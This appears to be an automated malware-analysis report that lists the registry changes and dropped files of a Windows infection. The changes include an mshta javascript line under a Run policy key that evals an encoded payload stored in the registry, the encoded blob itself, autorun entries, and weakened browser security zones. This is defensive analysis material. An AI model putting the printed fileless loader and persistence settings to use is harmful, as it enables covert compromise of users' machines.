[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSSetupNativeUtils.exe:1552 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 FC 4F 3C 61 18 F1 5B 7C 3F 69 6D 03 BC 01 EF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process regsvr32.exe:1296 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 0B 0A 90 95 61 AC 19 C1 29 00 68 CF B5 A5 B0"

The process regsvr32.exe:1992 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 42 7D 9D 30 16 00 1E 86 FB 93 5C BE 58 F7 22"

The process regsvr32.exe:304 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:phKe2THZZ=D;H2s7=new ActiveXObject(WScript.Shell);NgYb21cccJ=eKxUQ0e9G;b7Wy7i=H2s7.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);T4nMHDyk2K=9FCt;eval(b7Wy7i);r5NDCZHgQ=TyV20;"

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "864"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ijid\ijid.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ijid\ijid.exe"
"5232108f" = "ëÁÖUÏ3zÖ4¢U÷ãDßøð°8LV³îÊó…ŸFò΋¨ `eçF$‡÷àéy7¹BÔi>( «5¥™úÕ½“ϯ‡çMîvÑ2¹‹jÀµp5«¥˜±a^3— ƒ‘†¦‘Ÿ÷èXånsq—Ì ŽÑàˆÀt¶©˜}•Y`í¿>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "JA5CRMYkRcwIo8XDHLCgiaVGb=NStOLKrn5ikND4g5xmKdBJdUzlTRZ;aPzR8TnNvMYavwkQyx7JiLuH=M4d4wWvBstkrW8bbZQloxtXNuQYOb3mNIN8hSjQnA42ElIbVMuRlemvhF0SsZnESwzHyCxMSIAkYolcpg9;zDNJgDcuDAw8SqdqVuO5u=vePKQfbS8oFgmJYfXsCMJosSJYqrdPwFuvWcnAIGRH5FZ6OFdavDzRNpRFOMTIRskJYLSm8GzHEgXkT4trvOGme49q8bUZtkAkEotSPsBUG8U055sBCDJ5wnvQZ0udcOQhoDcHdlR9P9;x5HmyuDxBnFOtrMiyed=7QJATft4AC4PEsFOhUgfa4mYUvRuMmCHT4jxKug8nW89IIZHd72p1ZgGtVZDMhG4WBH6xYaXucpsEwHG;tsB6=2133213A1039372A2D457B1A313031702A2B1D694650401B33210434363F41393E3735222103430A0D011E15774307380C365D5C1C0A3A37262D3C0A254D56131B0713072D1E1805751E5E157E7C0669461E0E7238352801757B382624130A2E3E3C283D171F31492407206D0A125C36453617253E3C1608180F370001120E6721241914760118022B4B46733D1D1914323A26240833357A3B7D192A551410081E56501E2B50156E1E0C033E05101D04202B080523242C71695624472A1259701C3C0601202465391F23446C0831233708362615201E547C110302510D4635261E287A0B6E1A09100B2F012F1708350A387B12572A311E133826021227594E62300623320F141D20360B612A2F251A02391101013C04551A391A3D3723110001240221"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "864"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
"5119f545" = "JA5CRMYkRcwIo8XDHLCgiaVGb=NStOLKrn5ikND4g5xmKdBJdUzlTRZ;aPzR8TnNvMYavwkQyx7JiLuH=M4d4wWvBstkrW8bbZQloxtXNuQYOb3mNIN8hSjQnA42ElIbVMuRlemvhF0SsZnESwzHyCxMSIAkYolcpg9;zDNJgDcuDAw8SqdqVuO5u=vePKQfbS8oFgmJYfXsCMJosSJYqrdPwFuvWcnAIGRH5FZ6OFdavDzRNpRFOMTIRskJYLSm8GzHEgXkT4trvOGme49q8bUZtkAkEotSPsBUG8U055sBCDJ5wnvQZ0udcOQhoDcHdlR9P9;x5HmyuDxBnFOtrMiyed=7QJATft4AC4PEsFOhUgfa4mYUvRuMmCHT4jxKug8nW89IIZHd72p1ZgGtVZDMhG4WBH6xYaXucpsEwHG;tsB6=2133213A1039372A2D457B1A313031702A2B1D694650401B33210434363F41393E3735222103430A0D011E15774307380C365D5C1C0A3A37262D3C0A254D56131B0713072D1E1805751E5E157E7C0669461E0E7238352801757B382624130A2E3E3C283D171F31492407206D0A125C36453617253E3C1608180F370001120E6721241914760118022B4B46733D1D1914323A26240833357A3B7D192A551410081E56501E2B50156E1E0C033E05101D04202B080523242C71695624472A1259701C3C0601202465391F23446C0831233708362615201E547C110302510D4635261E287A0B6E1A09100B2F012F1708350A387B12572A311E133826021227594E62300623320F141D20360B612A2F251A02391101013C04551A391A3D3723110001240221"
"0494a3ce" = "1456888268"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 D7 3C E1 11 19 53 22 29 8F 18 F5 AF F2 74 2C"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
"5232108f" = "ëÁÖUÏ3zÖ4¢U÷ãDßøð°8LV³îÊó…ŸFò΋¨ `eçF$‡÷àéy7¹BÔi>( «5¥™úÕ½“ϯ‡çMîvÑ2¹‹jÀµp5«¥˜±a^3— ƒ‘†¦‘Ÿ÷èXånsq—Ì ŽÑàˆÀt¶©˜}•Y`í¿>"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1456888268"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ijid\ijid.exe"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ijid\ijid.exe"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Malware disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:1496 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\5DF0CC28CAE1031B]
"A02F947856236BC27B4" = "A02F947856236BC27B4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 4B 00 D9 C7 4D A3 52 5A 78 76 AF EC 25 6A 2D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\1CD34B7B94B9F267E]
"3AC221EB0F8EA271C1A0" = "3AC221EB0F8EA271C1A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\5DF0CC28CAE1031B]
[HKLM\SOFTWARE\1CD34B7B94B9F267E]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\5DF0CC28CAE1031B]
"A02F947856236BC27B4"

[HKLM\SOFTWARE\1CD34B7B94B9F267E]
"3AC221EB0F8EA271C1A0"

The process wsmanhttpconfig.exe:2816 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 8A E5 E1 BA 95 69 5B 43 5C FC 85 B2 BE 21 BB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "93A11FE9-0404-4C43-9BA0-D9D39D631CEE"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

The process wsmanhttpconfig.exe:2876 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 51 A3 E4 DD 61 6E A0 A6 0C 9B 47 C0 95 DE 10"

Dropped PE files

MD5 File path
9859a26d5e72bbb0685af813b409d99dc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
fc9a05096522bb6d7ceda62ea1707420c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe
35efd8cd6549a4339cb2a28c8cfd6598c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe
a39df582ca051afc8811fbd00db12f10c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll
75c183e262bd4400eb0f20349f6ef383c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll
2f7fe3a781ba8c0a67c775f20e3e9f70c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll
4e2482e69baaf3a5b13db8101c063ebfc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll
08e87e8abf7b41b28663dce817ce0ab6c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll
b87e087fc013225e2aa1cb60c080647dc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
f3ac3f844f90380aab2b4c0836c4288fc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
1ce73fb3f88c716cfc3fd550547d2b35c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll
dfeb401cc051e5da721c584ff6a90f88c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
36ff641f37918f2cca98e7f407ac4d75c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
3991b7fa452a9c9c291c06365a236792c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
37bed865557084dd9988350ab1675e0bc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Editor.resources.dll
208fa9d0ebe2ceb9616042772e96598ec:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll
108500a98b9a2f66823e7615398fc87bc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.resources.dll
d4eefccdc3de6ced901535fa4153c491c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.dll
5a69fb5d686f863e0e13268d671ef16dc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.dll
c7a0d1321a67a2afd330c5fbe79befd1c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll
53a9d748ef09920a0d06da2583c298adc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
6372ea7d2aced7185183cf3fcdd3577bc:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll
1a4e900c2fe3cd31d10107670d184fe6c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
f7da27672d2e4c21a1f996ee31de0dbfc:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
2286b57ecc2d32d24049c51989084268c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll
4d8ab4fad244f7985d8c59d456e026d7c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
930cdc3163f4d4a6bd52f96896e9fa44c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.Backgroun#\fd3edcdfa9ce60abac35208146184495\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll
e27a37cfbcff4c9941e73c9a3e762d0cc:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\13fc3daef585098f11911f8f72ac1cea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
8afa150131c5cba4b312493db94d30fbc:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\72a5e788c4076b67ec6897dadb9c00b6\Microsoft.PowerShell.Editor.ni.dll
8984e670f9760c504c5fca8370ad99d3c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\93926797486d4f7a9b69c5875ff3fc30\Microsoft.PowerShell.Commands.Utility.ni.dll
fe8b145b025e02fb4e23381a2e189d0ac:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\dc19f50c5e84e7223433cc709e7eb43f\Microsoft.PowerShell.ConsoleHost.ni.dll
6756eea89ecbaa301b79e4d01f381cd1c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\f007ee1bf548ba761ba616f4c35b158e\Microsoft.PowerShell.Commands.Management.ni.dll
85d7ab466d0577c49fc9879107ec7ef5c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
173d3dd1425a8e33fa1d4ed71067a3a2c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
